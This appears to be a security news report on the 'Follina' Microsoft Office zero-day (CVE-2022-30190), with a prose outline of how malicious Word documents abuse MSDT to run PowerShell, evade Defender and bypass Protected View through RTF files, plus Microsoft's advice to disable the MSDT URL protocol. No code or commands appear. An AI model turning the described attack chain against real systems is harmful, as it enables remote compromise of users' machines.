New Microsoft Office Zero-Day ‘Follina’ Exploited in Remote Code Execution Attacks

Bitdefender Download For Windows 10

Security researchers recently discovered a new Microsoft Office zero-day flaw exploited in PowerShell remote code execution attacks. The new vulnerability, tracked as CVE-2022-30190, would let hackers execute malicious PowerShell commands through Microsoft Diagnostic Tool (MSDT).

Researchers believe the flaw, dubbed “Follina,” has been around for a while, as they traced it back to a Microsoft report made on April 12. The vulnerability leverages Office functionality to download an HTML file, which exploits the MSDT to let attackers execute code remotely on compromised devices.

To make matters worse, Follina works without elevated privileges, can bypass Windows Defender detection, and doesn’t need macro code enabled to run scripts or execute binaries. The flaw was discovered by accident last Friday when security researcher nao_sec stumbled upon a malicious Word document submitted to a virus scanning platform.

The researcher posted a screenshot of some obfuscated code used by the malicious file, which security researcher Kevin Beaumont deobfuscated. Beaumont said the code is a command-line string that can be executed by Microsoft Word through MSDT, even if macros are not enabled.

Running the PowerShell script would extract a Base64-encoded file from a RAR archive on the compromised device and execute it. However, the nature of the malicious activity remains unclear, as the extracted file is no longer available.

Microsoft Office’s Protected View feature triggers to warn users of potentially unsafe documents. However, Beaumont believes that converting the document to a Rich Text Format (RTF) file could allow attackers to bypass this warning and even run the obfuscated code “without even opening the document (via the preview tab in Explorer).”

Yesterday Microsoft published a brief guide to workarounds and recommendations to help customers mitigate the newly discovered vulnerability. Currently, disabling the MSDT URL protocol seems to be the safest option.